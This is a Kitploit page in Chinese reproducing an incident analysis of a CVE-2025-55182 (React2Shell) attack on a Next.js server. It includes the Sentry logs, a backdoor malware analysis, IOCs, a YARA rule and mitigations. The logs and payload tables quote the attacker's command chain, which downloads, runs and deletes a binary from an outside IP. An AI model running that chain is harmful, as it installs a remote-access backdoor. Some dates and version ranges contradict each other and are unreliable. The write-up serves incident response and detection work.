Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-55182-Attack-Analysis — 针对CVE-2025-55182(React2Shell)的真实世界攻击分析 - React Server Components RCE漏洞 | Kitploit
工具/GitHubGitHub/ngvcanh/cve-2025-55182-attack-analysis
危害指标 (IOC) 管理漏洞分析取证分析Web安全恶意软件分析威胁情报学习与教育事件响应
GitHub

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
ngvcanh/cve-2025-55182-attack-analysis

CVE-2025-55182-Attack-Analysis

针对CVE-2025-55182(React2Shell)的真实世界攻击分析 - React Server Components RCE漏洞

查看仓库
69个月前尚未审核

CVE-2025-55182 攻击分析:React 服务器组件远程代码执行

针对生产环境 Next.js 应用的真实攻击分析

📋 目录

  • 执行摘要
  • 漏洞概述
  • 攻击时间线
  • 技术分析
  • 恶意软件分析
  • 失陷指标(IOCs)
  • 缓解措施与响应
  • 经验教训
  • 参考资料

执行摘要

2025 年 12 月 5 日,我们的生产环境 Next.js 应用遭到攻击者利用 CVE-2025-55182(React2Shell)的攻击,这是 React 服务器组件中的一个严重远程代码执行漏洞。该攻击试图在我们的服务器上下载并执行 Linux 后门木马。

属性值
CVE IDCVE-2025-55182
CVSS 评分9.8(严重)
攻击日期2025 年 12 月 5 日
攻击结果✅ 已阻止(补丁后)
恶意软件类型Linux 后门木马
受影响技术栈Next.js + React 服务器组件

漏洞概述

什么是 CVE-2025-55182?

CVE-2025-55182,又称 "React2Shell",是一个影响 React 服务器组件(RSC)的严重远程代码执行(RCE)漏洞,涉及:

  • React:19.0.0 - 19.2.1 版本
  • Next.js:15.x 和 16.x 版本(补丁发布前)

根本原因

该漏洞存在于 React 的 Flight Server 中的 renderToReadableStream() 函数内。在处理特制的 RSC 载荷时,服务器未能正确清理某些输入,从而导致任意代码执行。

攻击向量

root@kitploit:~
Attacker → Malicious RSC Payload → Flight Server → eval() → RCE

攻击者发送一个带有恶意序列化载荷的特制 POST 请求,该载荷会被反序列化并在服务器上执行。


攻击时间线

阶段 1:初始利用尝试(补丁前)

时间戳(UTC)事件
Dec 5, 06:20通过 Sentry 检测到首次攻击
Dec 5, 06:20载荷尝试执行 shell 命令
Dec 5, 06:20攻击部分成功(补丁前)

Sentry 错误日志(补丁前):

root@kitploit:~
Error: root
  at eval (eval at <anonymous>, <anonymous>:3:6)
  at nk (chunk.js)
  at JSON.parse (<anonymous>)
  at n5 (/app/node_modules/next/dist/server/app-render.js)

阶段 2:补丁部署

时间戳操作
Dec 4, 14:13升级到 Next.js 16.0.7
Dec 4, 14:13部署修复版本(v1.0.0-beta-4)

阶段 3:补丁后攻击被阻止

时间戳(UTC)事件
Dec 5, 08:48检测到攻击尝试
Dec 5, 08:48载荷执行已被阻止
Dec 5, 08:48错误:syntax error: unexpected ";"

Sentry 错误日志(补丁后):

root@kitploit:~
Error: Command failed: wget http://45.76.155.14/vim -O /tmp/vim ; 
chmod +x /tmp/vim ; nohup /tmp/vim > /dev/null 2>&1 & ; rm -f /tmp/vim
/bin/sh: syntax error: unexpected ";"

补丁成功阻止了恶意命令的执行。


技术分析

攻击请求详情

属性值
目标 URLhttps://[REDACTED]/
方法

载荷分析

攻击者试图执行以下命令链:

root@kitploit:~
wget http://45.76.155.14/vim -O /tmp/vim ; \
chmod +x /tmp/vim ; \
nohup /tmp/vim > /dev/null 2>&1 & ; \
rm -f /tmp/vim

分解说明:

服务器环境

组件版本
操作系统Alpine Linux 3.23.0
运行时Node.js v20.19.6
框架Next.js 16.0.7(已修补)
容器

恶意软件分析

文件信息

VirusTotal 结果

检出率: 13/72(18%)

VirusTotal 链接: 查看分析

二进制分析

ELF 文件头:

root@kitploit:~
00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000  .ELF............
00000010: 0200 3e00 0100 0000 60e7 4500 0000 0000  ..>.....`.E.....

识别出的能力:

提取的字符串(相关):

root@kitploit:~
crypto/aes
crypto/tls
net/http
socks5
vendor/golang.org/x/crypto/chacha20poly1305
vendor/golang.org/x/net/http2/hpack

触发的 IDS 规则

严重性规则来源
低ET POLICY HTTP traffic on port 443 (POST)Proofpoint ET Open
低ET DNS Query for .cc TLDProofpoint ET Open

恶意软件分类

类型: Linux 后门木马

能力:

  • 远程 shell 访问
  • 命令与控制(C2)通信
  • 文件上传/下载
  • 加密通信
  • 通过 SOCKS5 进行流量隧道
  • 持久化机制

失陷指标(IOCs)

网络 IOC

文件 IOC

行为 IOC

YARA 规则

root@kitploit:~
rule CVE_2025_55182_Backdoor {
    meta:
        description = "Detects backdoor distributed via CVE-2025-55182"
        author = "Security Researcher"
        date = "2025-12-05"
        hash = "0f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce"
    
    strings:
        $elf = { 7F 45 4C 46 }
        $go1 = "vendor/golang.org/x/crypto" ascii
        $go2 = "vendor/golang.org/x/net" ascii
        $net1 = "net/http" ascii
        $net2 = "socks5" ascii
        $crypto1 = "crypto/tls" ascii
        $crypto2 = "chacha20poly1305" ascii
    
    condition:
        $elf at 0 and
        (2 of ($go*)) and
        (1 of ($net*)) and
        (1 of ($crypto*))
}

缓解措施与响应

已采取的紧急措施

滥用报告

我们于 2025 年 12 月 5 日向 Vultr(C2 服务器的托管服务商)提交了滥用报告,内容包括:

  • 恶意 IP 地址和 URL
  • 恶意软件的 SHA256 哈希
  • VirusTotal 分析链接
  • 攻击向量描述(CVE-2025-55182)

已修补版本

软件包受影响版本修复版本
Next.js< 15.3.3, < 16.0.5≥ 15.3.3, ≥ 16.0.5
React19.0.0 - 19.1.0≥ 19.2.1(2025 年 6 月及之后)

建议的缓解措施

1. 立即升级:

root@kitploit:~
# For Next.js 16.x
npm install [email protected] [email protected] [email protected]

# For Next.js 15.x
npm install [email protected] [email protected] [email protected]

2. 阻止恶意 IP:

root@kitploit:~
# iptables
sudo iptables -A INPUT -s 45.76.155.14 -j DROP
sudo iptables -A OUTPUT -d 45.76.155.14 -j DROP

# UFW
sudo ufw deny from 45.76.155.14
sudo ufw deny to 45.76.155.14

3. 监控 IOC:

root@kitploit:~
# Check for suspicious files
find /tmp -type f -executable 2>/dev/null

# Check for suspicious processes
ps aux | grep -E "(vim|/tmp/)"

# Check network connections
netstat -an | grep "45.76.155.14"

4. 轮换所有密钥:

  • 数据库凭据
  • JWT 密钥
  • API 密钥
  • 会话密钥

经验教训

做得好的方面

  1. Sentry 监控立即捕获了攻击
  2. 快速部署补丁,在 CVE 披露后数小时内完成
  3. Docker 容器化限制了爆炸半径
  4. 补丁后防护成功阻止了后续攻击

可以改进的方面

  1. 更快的补丁部署 - 缩短 CVE 披露与修补之间的时间
  2. WAF 规则 - 添加用于检测 RSC 利用尝试的规则
  3. 出站过滤 - 阻止到未知 IP 的出站连接
  4. 自动化告警 - 针对可疑 shell 命令设置告警

安全建议


参考资料

官方公告

  • Next.js 安全公告
  • React 安全更新
  • CVE-2025-55182 详情

分析资源

  • VirusTotal 分析
  • MalwareBazaar

使用的工具

  • Sentry - 错误监控
  • VirusTotal - 恶意软件分析
  • Docker - 容器化

免责声明

本文档仅供教育和防御目的发布。本仓库不包含恶意软件二进制文件。安全研究人员可使用提供的 SHA256 哈希通过 VirusTotal 获取样本。


作者

发布于: 2025 年 12 月 5 日

联系方式: [您的联系信息或 GitHub 个人资料]


许可证

本分析依据 CC BY 4.0 许可发布。您可以自由分享和改编本材料,但需注明适当出处。


更新日志

日期版本变更内容
2025-12-051.0首次发布
下载工具
POST
User-AgentPython Requests 2.31
来源自动化攻击脚本
步骤命令目的
1wget http://45.76.155.14/vim -O /tmp/vim下载恶意软件
2chmod +x /tmp/vim赋予执行权限
3nohup /tmp/vim > /dev/null 2>&1 &后台运行,注销后依然存活
4rm -f /tmp/vim删除证据
Docker
属性值
文件名vim(伪装成合法工具)
SHA2560f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce
文件类型ELF 64 位 LSB 可执行文件,x86-64
语言Go(编译后的二进制文件)
文件大小约 4.7 MB
厂商检出名称
DrWebLinux.BackDoor.Siggen.389
AhnLab-V3Backdoor/Linux.Agent.4780032
KasperskyHEUR:Trojan.Linux.Agent.gen
ESET-NOD32Linux/Agent.PX Trojan
Avast/AVGELF:Agent-BQE [Trj]
AliCloudTrojan:Linux/Agent.ff565f70
Antiy-AVLTrojan/Linux.Agent.px
RisingTrojan.Agent/Linux!8.13268
SentinelOneStatic AI - Suspicious ELF
TencentMalware.Linux.Generic.1c03c8b9
ZillyaTrojan.Agent.Linux.5292
能力证据
HTTP/HTTPS 客户端net/http, *http.Client
TLS 加密crypto/tls, crypto/aes
SOCKS5 代理socks, socks5
DNS 解析net/dns/dnsmessage
强加密chacha20poly1305, Ed25519
类型值描述
IP 地址45.76.155.14恶意软件分发服务器
URLhttp://45.76.155.14/vim恶意软件下载 URL
托管Vultr VPS云服务提供商
TLD.ccC2 域名使用 .cc 顶级域名
类型值
SHA2560f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce
SHA1[Calculate if needed]
MD5[Calculate if needed]
文件名vim(伪装)
文件类型ELF 64 位 x86-64
文件大小约 4.7 MB
指标描述
wget 到外部 IP从非标准 URL 下载
/tmp/ 中的文件临时目录中的可疑可执行文件
nohup + 后台执行持久化尝试
立即删除文件清除证据
Python Requests User-Agent自动化攻击工具
操作状态详情
✅ 升级 Next.js已完成16.0.4 → 16.0.7
✅ 升级 React已完成19.1.0 → 19.2.1(已修补)
✅ 重新部署应用已完成Docker 重新构建
✅ 分析恶意软件已完成已提交 VirusTotal
✅ 向托管商举报已完成已向 Vultr 发送滥用报告
⏳ 轮换凭据待处理数据库、JWT、API 密钥
类别建议
监控实施实时错误监控(Sentry 等)
更新订阅所有依赖项的安全公告
网络实施出站过滤,阻止不必要的出站流量
容器以非 root 用户运行,使用只读文件系统
密钥定期轮换凭据,使用密钥管理器